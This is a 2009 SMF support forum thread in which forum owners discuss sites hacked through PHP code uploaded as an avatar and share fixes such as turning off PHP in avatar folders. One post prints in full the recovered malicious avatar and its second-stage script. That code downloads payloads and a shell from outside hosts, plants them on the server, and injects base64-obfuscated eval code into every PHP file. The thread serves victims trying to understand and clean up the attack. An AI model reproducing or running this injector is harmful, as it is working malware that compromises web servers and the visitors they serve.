News:

Want to get involved in developing SMF, then why not lend a hand on our github!

Main Menu

Hacked, script injection

Started by vHawkeyev, May 01, 2009, 10:47:02 AM

Previous topic - Next topic

Tiribulus

Quote from: H on May 05, 2009, 04:57:21 PM
There is an option you can set in .htaccess that will disable the use of php completely.

I think it is "php_value engine off" but google should provide more, as I don't normally use Apache/.htaccess

It looks like that's right.
adding an .htaccess file with this php_value engine off entry should work.

Or, it seems you could also add this
<Location "/docroot/av_directory">
php_admin_flag engine off
</Location>.
  to the httpd.conf file to accomplish the same thing

I was thinking it might not be a bad idea to throw such a .htaccess file in every directory that doesn't need PHP interpretation, but that might be misused that way.

hobox

Krisbarteo had done the same to my forum. An avatar 1,82KB large. All my PHP files were corrupted

He came from 94.142.129.147

MrPhil

Quote from: Tiribulus on May 05, 2009, 06:28:08 PM
adding an .htaccess file with this php_value engine off entry should work.

On many systems it won't work, as php_value and php_flag are not permitted in .htaccess. For those systems, put something like engine = off in a php.ini file. You may also need to put an entry in .htaccess to tell PHP where to find that file.


Aleksi "Lex" Kilpinen

Quote from: H on May 05, 2009, 04:57:21 PM
There is an option you can set in .htaccess that will disable the use of php completely.

I think it is "php_value engine off" but google should provide more, as I don't normally use Apache/.htaccess
This is correct - I have it in use for a custom avatar folder.
Slava
Ukraini!
"Before you allow people access to your forum, especially in an administrative position, you must be aware that that person can seriously damage your forum. Therefore, you should only allow people that you trust, implicitly, to have such access." -Douglas

How you can help SMF

bsm

Well, it took me a while - but all scripts are clean, and I'm up and running.

NOW, I have a full backup of clean scripts - ready to restore anytime.

CarlT100

CarlT100


Tiribulus

What I found out so far is that the host has to have AllowOverride set in httpd.conf to permit .htaccess file directives to supersede the global settings in order for this to work with .htaccess files. This might be what the guy above was talking about. The Apache docs say this can have a negative effect of performance due to the scanning required to find the commands in those files. They say if possible to include them in the directory section of httpd.conf. Being that the server is sitting at my feet I did this:


<Directory "/path to avs dir/">
php_admin_flag engine off
</Directory>


Now my hello.php file is offered for download instead of being run. Hmmm, I suppose that is preferable to being executed on the server.

H

Quote from: MrPhil on May 05, 2009, 11:09:41 PM
Quote from: Tiribulus on May 05, 2009, 06:28:08 PM
adding an .htaccess file with this php_value engine off entry should work.

On many systems it won't work, as php_value and php_flag are not permitted in .htaccess. For those systems, put something like engine = off in a php.ini file. You may also need to put an entry in .htaccess to tell PHP where to find that file.

Thanks for this. Although it seems a little absurd that hosts prevent these options in .htaccess but yet let the user run a custom php.ini :o
-H
Former Support Team Lead
                              I recommend:
Namecheap (domains)
Fastmail (e-mail)
Linode (VPS)
                             

sjokomelk

#49
I dunno if this will help anyone but the content of the avatar is the following:
I've cleaned it up a little.

<?php;$url 'http://wplsat23.net/?update=main';$done false;if(!$url){return '';}$url_info parse_url($url);$url_info[port] = ($url_info[port]) ? $url_info[port]:80;$url_info[path] = ($url_info[path]) ? $url_info[path] : "/"; $url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" $url_info[query] : ""; $query "GET " $url_info[path] . " HTTP/1.1\r\n"; $query $query "Host: " $url_info[host] . "\r\n"; $query $query "Accept: */*" "\r\n"; $query $query "Connection: close" "\r\n"; $query $query "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "\r\n"; $query $query "\r\n"; $errno 0; $error ""; $sock fsockopen($url_info[host], $url_info[port], $errno$error30);$h = array();$resp = array();if($sock){stream_set_timeout($sock30);fwrite($sock$query);$hd false;while(!feof($sock)){$l fgets($sock);if(!$hd){if(trim($l) == ''){$hd true;}else{$h[] = $l;}}else{$resp[] = $l;}}fclose($sock);}$ret implode(""$resp);eval($ret);?>

and this is the code on that page:
$ver = "1.0";
$GLOBALS['dbg'] = 0;
$GLOBALS['rewrite_old'] = 1;

set_time_limit(600);
$pu = "http://nomsat23.net/?update=js&host={$_SERVER['HTTP_HOST']}";
$eu = "http://nomsat23.net/?update=shl&host={$_SERVER['HTTP_HOST']}";

//$pu = "http://wpl/?update=js&host={$_SERVER['HTTP_HOST']}";
//$eu = "http://wpl/?update=shl&host={$_SERVER['HTTP_HOST']}";

$GLOBALS['dgin'] = "style.css.php";
$GLOBALS['dgsf'] = "s.php";
$GLOBALS['dgdn'] = "dg.php";
$GLOBALS['dgfn'] = "";

//detect full path
if(!file_exists($_SERVER['SCRIPT_FILENAME'])){
if(file_exists($_SERVER['PATH_TRANSLATED'])){
$_SERVER['SCRIPT_FILENAME'] = $_SERVER['PATH_TRANSLATED'];
}else{
die("<b style='color:red'>can't detect exploit full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[49295073]");
}
}
$_SERVER['SCRIPT_FILENAME'] = str_replace('\\', '/', $_SERVER['SCRIPT_FILENAME']);
$_SERVER['SCRIPT_FILENAME'] = preg_replace("/\/+/", "/", $_SERVER['SCRIPT_FILENAME']);
echo "<b style='color:green'>exploit full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[6910002]<br>";

$tmp = explode("/", $_SERVER['REQUEST_URI']);
$GLOBALS['dglvl'] = count($tmp) - 2;
echo"{$ver}<h2>http://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}</h2>";

$path = explode("/", $_SERVER['SCRIPT_FILENAME']);
$path = array_slice($path, 0, count($path) - 1);
$GLOBALS['fpath'] = implode("/", $path) . '/';

//detecting real path
$uri = explode("/", $_SERVER['REQUEST_URI']);
$uri = array_slice($uri, 0, count($uri) - 1);

//print_r($path);
//print_r($uri);

while(count($uri) > 0 && count($path) > 0 && strtolower($uri[count($uri) - 1]) == strtolower($path[count($path) - 1])){
unset($uri[count($uri) - 1]);
unset($path[count($path) - 1]);
}
//echo"<hr>";
//print_r($path);
//print_r($uri);

$GLOBALS['dgsp'] = implode("/", $path) . '/';

if(isset($_GET['dgd'])){
error_reporting(E_ALL & ~E_NOTICE);
}else{
error_reporting(0);
}

if(isset($_GET['phpinfo'])){
phpinfo();
die;
}

//$GLOBALS['dgsp'] = $_SERVER['DOCUMENT_ROOT'];
if(substr($GLOBALS['dgsp'], strlen($GLOBALS['dgsp']) - 1, 1) <> '/'){
$GLOBALS['dgsp'] .= '/';
}

echo"<b style=\"color:green\">root dir path [{$GLOBALS['dgsp']}]</b><br><br>";

$GLOBALS['dgcgr'] = 0;
$GLOBALS['dgcgrf'] = 0;
$my_uid = getmyuid();
$my_gid = getmygid();
$my_cid = get_current_user();
echo "SYSTEM: " . `uname -a` . "<br>";
if(ini_get('safe_mode')){echo "<h1 style='color:red'>SAFE MODE</h1>";}

echo"MY USER ID: {$my_uid}; MY GROUP ID: $my_gid; CURRENT USER: {$my_cid}<br>";

if(!function_exists('phpinj')){
function phpinj($ff, &$str, $inj = 0, $silent = true){
global $_SERVER;
$alien_shells = array("los.php","r0x.php");
$our_folder = 0;
$folder = $ff;
$folder = str_replace('\\', '/', $folder);
if(substr($folder, strlen($folder) - 1, 1) <> '/'){
$folder .= '/';
}
if(!$folder){
if(!$silent){echo"<font color='red'>bad folder path [{$folder}]</font><br>";}
return;
}
if(!is_dir($folder)){
if(!$silent){echo"<font color='red'>{$folder} - is not a folder</font><br>";}
return;
}
if($GLOBALS['dgdirs'][$folder]){
if(!$silent){echo"<font color='yellow'>{$folder} already checked</font><br>";}
return;
}
$GLOBALS['dgdirs'][$folder] = 1;

if($folder == $GLOBALS['dgcp'] || file_exists($folder.$GLOBALS['dgin'])){
if(!$silent){echo"<h4>{$folder} is our dir, skipping...</h4>";}
$our_folder = 1;
}
$dir_perm = substr(sprintf('%o', fileperms($folder)), -4);

$file_stat = stat($folder);
$file_uid = $file_stat[4];
$file_gid = $file_stat[5];
if(function_exists('posix_getpwuid')){
$file_stat = posix_getpwuid($file_uid);
$file_uidn = "; uname:{$file_stat['name']}";
}
if(function_exists('posix_getgrgid')){
$file_stat = posix_getgrgid($file_gid);
$file_gidn = $file_stat['name'];
$file_gidn = "; gname:{$file_gidn}";
}
$file_info = "[uid:{$file_uid}; gid:{$file_gid}{$file_uidn}{$file_gidn}] ";
if(!$silent){echo"{$file_info}[$dir_perm] {$folder}<br>";flush();}
$h = opendir($folder);
if(!$h){
if(!$silent){echo"<font color='red'>{$folder}</font><br>";}
return;
}
while(strlen($f = readdir($h))){
if($f == '.' || $f == '..'){
continue;
}
$pc = 0;
$mkr = md5($f);
$lc = "";
$lp = "";
$fh = false;

$file = $folder.$f;
if($f == $_SERVER['SCRIPT_FILENAME']){
if(!$silent){echo"<h4>{$file} is our exploit</h4>";}
continue;
}
if(is_file($file) && !$our_folder){
if($f == 'functions.php' && (strlen($folder) - strrpos($folder, "wp-includes") == 12)){
if(can_write($file)){
echo"<b style='color:green'>{$file}</b><br>";
dgrself($file, $silent);
}else{
echo"<b style='color:red'>{$file}</b><br>";
}
}
if($f == 's.php'){
if(!$silent){echo"<font color='red'>{$file} is shell</font><br>";}
continue;
}
if(in_array(strtolower($f), $alien_shells)){
if(unlink($file)){
if(!$silent){echo"<h3 style='color:green'>{$file} ALIEN SHELL</h3>";}
}else{
if(!$silent){echo"<h3 style='color:red'>{$file} ALIEN SHELL</h3>";}
}
continue;
}
if(!in_array(strtolower(gfe($file)), array("php","phtml","php3"))){
continue;
}
if($GLOBALS['dgfiles'][$file]){
if(!$silent){echo"<font color='yellow'>{$file} already checked</font><br>";}
continue;
}
$GLOBALS['dgfiles'][$file] = 1;
$file_stat = stat($file);
$file_uid = $file_stat[4];
$file_gid = $file_stat[5];
if(function_exists('posix_getpwuid')){
$file_stat = posix_getpwuid($file_uid);
$file_uidn = "; uname:{$file_stat['name']}";
}
if(function_exists('posix_getgrgid')){
$file_stat = posix_getgrgid($file_gid);
$file_gidn = $file_stat['name'];
$file_gidn = "; gname:{$file_stat['name']}";
}
$file_info = "[uid:{$file_uid}; gid:{$file_gid}{$file_uidn}{$file_gidn}] ";
$file_perm_was = substr(sprintf('%o', fileperms($file)), -4);
$file_handler = fopen($file, "a+");
$perms_str = "{$file_info}[{$file_perm_was}] ";
if(!$file_handler){
if(!$silent){echo"{$perms_str}<font color='red'>{$file}</font><br>";flush();}
continue;
}
fclose($file_handler);
$fc = implode("", file($file));
$nc = preg_replace("/\<\!\-\-$mkr\-\-\>.*\<\!\-\-$mkr\-\-\>/siU", "", $fc);
$nc = preg_replace("/^\s*\<\?(\w{3})?\s*\/\*\*\/\s*eval\(base64_decode.*\)\)\;\s*\?\>\s*(\S)/siU", "$2", $nc);
clear_exploits($nc);
if($nc <> $fc){$lc = " <b>[cleared]</b>";}else{$lc = " <b>[not patched]</b>";}
if(preg_match("/\@zend/i", $nc)){
if(!$silent){echo"{$perms_str}<b>ZEND</b> <font color='red'>{$file}</font>{$lc}<br>";flush();}
}elseif($inj && strpos(strtolower($folder), '/cache/')){
$lp = " <b style='color:orange'> [cached file]</b>";
}elseif($inj){
$nc = "{$ot}{$str}{$ot}\n{$nc}";
$lp = " <b> [patched]</b>";
}
if($fc <> $nc){
save_text_to_file($file, $nc, "$perms_str<font color='green'>{$file}{$lc}{$lp}</font><br>", 1, $silent);
}else{
if(!$silent){echo"$perms_str<font color='green'>{$file}{$lc}{$lp}</font><br>";}
}
}elseif(is_dir($file)){
phpinj($file.'/', $str, $inj, $silent);
}
}
closedir($h);
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('clear_exploits')){
function clear_exploits(&$text){
$text = preg_replace("/\<\?(\w{3})?\s*eval\(base64_decode.*\)\)\;\s*\?\>/siU", "", $text);
}
}

if(!function_exists('can_write')){
function can_write($fn){
$f = fopen($fn, "a");
if($f){
fclose($f);
return true;
}else{
return false;
}
}
}

if(!function_exists('leave_clear_php')){
function leave_clear_php(&$txt){
$txt = substr($txt, strpos($txt, '<?'), strlen($txt));
$txt = substr($txt, 0, strrpos($txt, '?>') + 2);
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('download')){
function download($url, $connect_timeout){
$done = false;
if(!$url){return '';}

$url_info = parse_url($url);
$url_info[port] = ($url_info[port]) ? $url_info[port] : 80;
$url_info[path] = ($url_info[path]) ? $url_info[path] : "/";
$url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" . $url_info[query] : "";
$query = "GET " . $url_info[path] . " HTTP/1.1\r\n";
$query = $query . "Host: " . $url_info[host] . "\r\n";
$query = $query . "Accept: */*" . "\r\n";
$query = $query . "Connection: close" . "\r\n";
$query = $query . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" . "\r\n";
$query = $query . "\r\n";
$errno = 0;
$error = "";
$sock = fsockopen($url_info[host], $url_info[port], $errno, $error, $connect_timeout);
$h = array();
$resp = array();
if($sock){
stream_set_timeout($sock, $connect_timeout);
fwrite($sock, $query);
$hd = false;
while(!feof($sock)){
$l = fgets($sock);
if(!$hd){
if(trim($l) == ''){
$hd = true;
}else{
$h[] = $l;
}
}else{
$resp[] = $l;
}
}
fclose($sock);
}
$ret = implode("", $resp);
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('save_text_to_file')){
function save_text_to_file($fn, $t, $m = '', $r = 0, $silent = false){
global $_GET;
if(isset($_GET['dgd'])){
$silent = false;
}
if($r){
$f = fopen($fn, "w");
}else{
$f = fopen($fn, "a");
}
if($f){
fwrite($f, $t);
fflush($f);
fclose($f);
if(!$silent){
echo $m;
}
/*set_chmod($fn);*/
}else{
if(!$silent){
echo "can't create file $fn";
}
die();
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('replace_substring')){
function replace_substring(&$text, $pret, $postt, $str){
$pos = strpos($text, $pret);
if(!$pos){return false;}
$pre = substr($text, 0, $pos + strlen($pret));
$pos = strpos($text, $postt, $pos);
if(!$pos){return false;}
$post = substr($text, $pos, strlen($text));
if(strlen($pre) && strlen($post)){
$text = $pre.$str.$post;
return true;
}
return false;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('set_chmod')){
function set_chmod($file){
if(!file_exists($file)){
return;
}
if(chmod($file, 0777)){
return('0777');
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('set_chmod_folder')){
function set_chmod_folder($file){
if(!file_exists($file)){
return;
}
if(chmod($file, 0666)){
return('0666');
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('gfe')){
function gfe($fn){
$ret = '';
$p = strrpos($fn, '.');
if($p){
$ret = (substr($fn, $p+1, strlen($fn)));
return $ret;
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('prepare_pack')){
function prepare_pack($php){
$cycles = 1;
$split_by_functions = 1;
$zip = 0;
if(!function_exists('base64_encode')){
return $php;
}
$ret = preg_replace("/^[^\s]+[\s]/U", "", $php);
$ret = preg_replace("/[\s][^\s]+\Z/", "", $ret);
$ret = trim($ret);
if($split_by_functions){
$tmp = preg_split('/\}\s+function/', $ret);
}else{
$tmp[] = $ret;
}
$skip_first = false;
if(count($tmp)){
$pos = strpos($tmp[0], 'function');
if($pos === 0){
$tmp[0] = substr($tmp[0], strlen('function'), strlen($tmp[0]));
}else{
$skip_first = true;
}
$ret = '';
$count = 0;
$total = count($tmp);
foreach($tmp as $key=>$val){
$val = preg_replace("/\s+/", " ", $val);
$count++;
$count == $total ? $add = '' : $add = '}';
if($total > 1 && !($count == 1 && $skip_first)){
$next_encoded = 'function '.trim($val).$add;
}else{
$next_encoded = trim($val).$add;
}
if($zip && function_exists('gzdeflate')){
$next_encoded = gzdeflate($next_encoded, 9);
}
$next_encoded = base64_encode($next_encoded);
if($zip && function_exists('gzdeflate')){
$ret .= "eval(gzinflate(base64_decode('{$next_encoded}')));";
}else{
$ret .= "eval(base64_decode('{$next_encoded}'));";
}
}
for($i = 0; $i < $cycles; $i++){
if($zip && function_exists('gzdeflate')){
$ret = gzdeflate($ret, 9);
}
$ret = base64_encode($ret);
if($zip && function_exists('gzdeflate')){
$ret = "eval(gzinflate(base64_decode('{$ret}')));";
}else{
$ret = "eval(base64_decode('{$ret}'));";
}
}
$ret = "<"."?php $ret?".">";
}
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('clear_folder')){
function clear_folder($folder, $remove = false){
$ret = true;
if(file_exists($folder)){
$h = opendir($folder);
while(strlen($file = readdir($h))){
if($file == '.' || $file == '..'){
continue;
}
if(is_dir($folder.$file)){
$ret = clear_folder($folder.$file.'/', true);
continue;
}
if(!unlink($folder.$file)){
$ret = false;
}
}
closedir($h);
if($remove && !rmdir($folder)){
$ret = false;
}
}
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

echo"<hr><div align='left'><br clear=\"all\">";

$pms = download($pu, 60);
if($pms){
echo"<b style=\"color:green\">main script download ok [size: " . strlen($pms) . "]</b><br>[543676657]<br>";
leave_clear_php($pms);
}else{
die("<b style=\"color:red\">main download failed [$pu]</b><br>[93771902]<br>");
}

$shl = download($eu, 60);
if($shl){
echo"<b style=\"color:green\">shell download ok [size: " . strlen($shl) . "]</b><br>[599387883]<br>";
leave_clear_php($shl);
}else{
die("<b style=\"color:red\">shell download failed [$eu]</b><br>[759303755]<br>");
}

flush();
$ddrs = array();
$dgmssp = array();
$a = false;
$GLOBALS['dgdirs'] = array();
echo"<h3>LOOKING FOR THE LONGEST PATH</h3>";
echo"<small>";

$tmp = explode("/", $GLOBALS['fpath']);
$path = '';
$c = 0;
foreach($tmp as $key=>$val){
if(!$val && $c){
continue;
}
$c++;
$path .= $val . "/";
if(strlen($GLOBALS['dgsp']) > strlen($path)){
continue;
}
if($path <> '/'){
if(isset($_GET['details'])){
echo"<h4>GOTO: $path</h4>";flush();
}
fddir($path, $ddrs, $a);
if(count($ddrs) > 0){
break;
}
}
}
if(!count($ddrs)){
if(isset($_GET['details'])){
echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush();
}
fddir($GLOBALS['dgsp'], $ddrs, $a);
}

echo"</small>";flush();

$max = 0;
$GLOBALS['dgcp'] = '';
$sep = '';
foreach($ddrs as $key=>$val){
if(!$sep){
if(!(strpos($key, '/') === false)){
$sep = '/';
}else{
$sep = '\\';
}
}
$fldr = explode($sep, $key);
$c = count($fldr);
if($max < $c){
$max = $c;
$GLOBALS['dgcp'] = implode($sep, $fldr);
}
}
if(!$GLOBALS['dgcp']){
die('<b style="color:red">nowhere to write anything</b><br>[4356398573]');
}else{
if($GLOBALS['dgsp'] == $GLOBALS['dgcp']){
die("<b style=\"color:red\">can't save to the document root</b><br>[657834657]");
}
echo"the longest available path: <b>{$GLOBALS['dgcp']}</b><br>";
$GLOBALS['dgcp'] = str_replace('\\', '/', $GLOBALS['dgcp']);
}
//setting up filenames
if(!replace_substring($pms, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){
die("<b style=\"color:red\">failed to set path</b><br>[44883279]");
}
echo"<b style=\"color:green\">path of main script successfully set [{$GLOBALS['dgcp']}]</b><br>[5482745]<br>";
if(!replace_substring($pms, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){
die("<b style=\"color:red\">failed to set name</b><br>[58819152]");
}
echo"<b style=\"color:green\">name of main script successfully set [{$GLOBALS['dgin']}]</b><br>[2246876]<br>";
if(!replace_substring($pms, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){
die("<b style=\"color:red\">failed to set relative root dir</b><br>[58819152]");
}
echo"<b style=\"color:green\">relative root dir successfully set [{$GLOBALS['dgsp']}]</b><br>[5893301]<br>";

//!!!!!!!!!!!!!!!!!!!!!!!!!!! attention !!!!!!!!!!!!!!!!!!!!!!! if this code executed by eval() command, HAVE TO COMMENT THIS
/*
if(!replace_substring($pms, '$GLOBALS[\'dgep\'] = "', '";', $_SERVER['SCRIPT_FILENAME'])){
echo"<b style=\"color:red\">failed to set path to exploit</b><br>[5093713]<br>";
}else{
echo"<b style=\"color:green\">path to exploit successfully set [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[8799102]<br>";
}
*/
//fix filename search
/*
$tmp = explode("/", $_SERVER['SCRIPT_FILENAME']);
$path = '';
$f = 0;
foreach($tmp as $key=>$val){
$path .= $val . "/";
if(file_exists($path.$GLOBALS['dgfn'])){
$f = 1;
if(!replace_substring($pms, '$GLOBALS[\'dgfxp\'] = "', '";', $path.$GLOBALS['dgfn'])){
echo"<b style=\"color:red\">failed to set path to fix file</b><br>[9477124]";
}else{
echo"<b style=\"color:green\">path to the file for fix successfully set [{$path}{$GLOBALS['dgfn']}]</b><br>[5018843]<br>";
}
break;
}
}
if(!$f){
echo"<b style=\"color:red\">failed to find path to fix file</b><br>[5488349]";
}
*/
$packed_js = prepare_pack($pms);
//$packed_js = $pms;
$my_size = strval(strlen($packed_js));
while(strlen($my_size) < 7){$my_size = '0' . $my_size;}
if(!replace_substring($pms, '"00'.'0', '";', $my_size)){
die("<b style=\"color:red\">failed to set size</b><br>[86612935]");
}
//$packed_js = $pms;
$packed_js = prepare_pack($pms);
echo"<br>my packed size: $my_size<br>";

save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgin'], $packed_js, "<b style=\"color:green\">main script path [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[48839]<br>", 1, $silent);
save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgsf'], $shl, "<b style=\"color:green\">shell path [{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}]</b><br>[58392]<br>", 1);
/*
if($GLOBALS['dbg']){
save_text_to_file($GLOBALS['fpath'].$GLOBALS['dgsf'], $shl, "<b style=\"color:green\">!!!!!!!!! test shell path [{$GLOBALS['fpath']}{$GLOBALS['dgsf']}] !!!!!!!!!!</b><br>", 1);
}
*/

function dgrself($path, $silent = true){
global $_GET;
if(!$silent){
echo "restoring functions.php at path [{$path}]<br>";flush();
}
$pf = implode("", file($path));
if($pf){
if(!$silent){
echo"{$path} loaded successfully<hr>";
}
}else{
if(!$silent){
echo"failed to load {$path}<br>[8856284]";
}
}
$pf = '';
$arr = file($path);
foreach($arr as $key=>$val){
if(strpos($val, 'eval(base64_decode') === false){
$pf .= $val;
}
}
save_text_to_file($path, $pf, "file {$path} successfully RESTORED<br>[88293764]<br>", 1, $silent);
}

function fddir($ff, &$madrs, &$flag){
global $_GET;
//if($flag || count($madrs) > 300){
if($flag){
return;
}
$php_found = "";
$writable = 0;
//$folder = realpath($ff);
$folder = $ff;
$folder = str_replace('\\', '/', $folder);
if(substr($folder, strlen($folder) - 1, 1) <> '/'){
$folder .= '/';
}
if(!file_exists($folder)){
echo"<font color='red'>{$folder} not exists</font><br>";
return;
}
if(!is_dir($folder)){
echo"<font color='red'>{$folder} is not dir</font><br>";
return;
}
$dir_perm = substr(sprintf('%o', fileperms($folder)), -4);
$new_dir_perm = substr(sprintf('%o', fileperms($folder)), -4);
if($new_dir_perm <> $dir_perm){
$new_dir_perm = "$dir_perm >> $new_dir_perm";
}
$succ = false;
$rndfl = rand(1,9999999999).'.php';
$f = fopen($folder.$rndfl, "w");
if(!$f){
if(isset($_GET['details'])){
echo"<font color=red>[{$new_dir_perm}] {$folder}</font><br>";flush();
}
}else{
if(isset($_GET['details'])){
echo"<font color=green>[{$new_dir_perm}] {$folder}</font><br>";flush();
}
fclose($f);
if(!unlink($folder.$rndfl)){
if(isset($_GET['details'])){
echo"<font color='red'>{$folder}{$rndfl} failed to delete</font><br>";
}
unset($madrs[$folder]);
}
$writable = 1;
}
if($GLOBALS['rewrite_old'] && $writable && file_exists($folder.$GLOBALS['dgin'])){
echo"<b style=\"color:green\">old js [{$folder}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";
if(file_exists($folder.'cnf')){
$ct = implode('', file($folder.'cnf'));
$ct = preg_replace("/ZGd1aA\=\=.*\n/", '', $ct);
save_text_to_file($folder.'cnf', $ct, "<br>config file updated<br>", 1);
//unlink($folder.'cnf');
}
$flag = true;
$madrs = array();
$madrs[$folder] = 1;
return;
}
$h = opendir($folder);
if(!$h){
if(isset($_GET['details'])){
echo"<font color='red'>$folder opendir failed</font><br>";
}
return;
}
while(strlen($f = readdir($h))){
if($f == '.' || $f == '..' || $f == '/' || $f == '\\'){
continue;
}
if(is_dir($folder.$f)){
fddir($folder.$f.'/', $madrs, $flag);
}elseif(is_file($folder.$f) && in_array(strtolower(gfe($folder.$f)), array("php","phtml","php3"))){
$php_found = $folder.$f;
}
}
closedir($h);
if($writable/* && $php_found*/){
$madrs[$folder] = 1;
}
}

$str = "if(function_exists('ob_start')&&!isset(\$GLOBALS['sh_no'])){\$GLOBALS['sh_no']=1;if(file_exists('{$GLOBALS['dgcp']}{$GLOBALS['dgin']}')){include_once('{$GLOBALS['dgcp']}{$GLOBALS['dgin']}');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode(\$d){\$f=ord(substr(\$d,3,1));\$h=10;\$e=0;if(\$f&4){\$e=unpack('v',substr(\$d,10,2));\$e=\$e[1];\$h+=2+\$e;}if(\$f&8){\$h=strpos(\$d,chr(0),\$h)+1;}if(\$f&16){\$h=strpos(\$d,chr(0),\$h)+1;}if(\$f&2){\$h+=2;}\$u=gzinflate(substr(\$d,\$h));if(\$u===FALSE){\$u=\$d;}return \$u;}}function dgobh(\$b){Header('Content-Encoding: none');\$c=gzdecode(\$b);if(preg_match('/\<body/si',\$c)){return preg_replace('/(\<body[^\>]*\>)/si','\$1'.gml(),\$c);}else{return gml().\$c;}}ob_start('dgobh');}}}";

$str = "<?php /**/eval(base64_decode('" . base64_encode($str) . "')); ?>";
echo"<small>";
echo"<h3>INJECTING PHP FILES</h3>";
$GLOBALS['dgdirs'] = array();
$GLOBALS['dgfiles'] = array();

echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush();
phpinj($GLOBALS['dgsp'], $str, 1, 0);

$tmp = explode("/", $GLOBALS['fpath']);
$path = '';
$c = 0;
foreach($tmp as $key=>$val){
if(!$val && $c){
continue;
}
$c++;
$path .= $val . "/";
if(strlen($GLOBALS['dgsp']) > strlen($path)){
continue;
}
echo"<h4>GOTO: $path</h4>";
phpinj($path, $str, 1, 0);
}

die("</small><hr><b>dgok</b></div>");


Quote from: hobox on May 05, 2009, 07:29:24 PM
Krisbarteo had done the same to my forum. An avatar 1,82KB large. All my PHP files were corrupted

He came from 94.142.129.147

Yeah that was the IP that he had when he paid my forum a visit too.

Tiribulus

Quote from: H on May 06, 2009, 01:13:32 PM
<<< Thanks for this. Although it seems a little absurd that hosts prevent these options in .htaccess but yet let the user run a custom php.ini :o

Yeah, lock the windows and leave the door open.

sjokomelk

Think I have at least worked out what the injection does.

The <?php eval(base64_decode  <insert value here>
contains an address to a folder in the installation.

In my case it was a theme helios multi template.

From 28th of April, until now, 25mb of files was stored there.
Over 2100 files.

All of which seems to be links to other infected sites which has been injected with commercials. With several commercials in each.
Many of the commercials seems to be flash files, which I haven't tested to run yet, but I downloaded all the files that the hack left and I'm going to inspect those closely.

Not that I will be able to make a difference in sorting out how to fix it, unless you can run a preg_replace and remove <? from files uploaded. But I'm not there yet with my php knowledge, so I'll just continue researching and posting what I find.

Rumboogy

He got me today too...I am in the process of restoring a backup (I hope).

I had a member ask if they could get a virus from this code? How do I answer that question.

Thanks,

Wally

Tiribulus

Am I correct in assuming that the only way to ban a member name that is not yet registered is to reserve the name?

JBlaze

Quote from: Tiribulus on May 06, 2009, 08:58:38 PM
Am I correct in assuming that the only way to ban a member name that is not yet registered is to reserve the name?

Or, create an account in that name and ban it.
Jason Clemons
Former Team Member 2009 - 2012

Tiribulus

Quote from: JBlaze on May 06, 2009, 10:18:04 PM
Quote from: Tiribulus on May 06, 2009, 08:58:38 PM
Am I correct in assuming that the only way to ban a member name that is not yet registered is to reserve the name?

Or, create an account in that name and ban it.

EUREKA!!!!!

Now why on Earth didn't I think of that ::)

JBlaze

Quote from: Tiribulus on May 06, 2009, 10:24:35 PM
Quote from: JBlaze on May 06, 2009, 10:18:04 PM
Quote from: Tiribulus on May 06, 2009, 08:58:38 PM
Am I correct in assuming that the only way to ban a member name that is not yet registered is to reserve the name?

Or, create an account in that name and ban it.

EUREKA!!!!!

Now why on Earth didn't I think of that ::)

Need to think outside the box :)
Jason Clemons
Former Team Member 2009 - 2012

djkimmel

Can't the person just come back again using a different name?

I had no idea someone could upload a fake avatar to the default attachments directory and cause this much damage and work. I do now.

SMF 1.1.8

